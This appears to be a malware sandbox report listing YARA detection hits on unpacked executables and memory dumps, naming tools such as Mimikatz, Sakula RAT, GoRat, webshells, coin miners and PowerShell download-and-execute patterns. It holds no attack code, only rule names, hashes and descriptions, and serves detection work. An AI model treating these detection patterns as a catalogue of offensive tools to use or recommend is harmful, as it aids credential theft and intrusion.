Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5e2d6a62.67.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp, type: MEMORY Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp, type: MEMORY Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 0000000B.00000003.18304005294.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18304005294.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
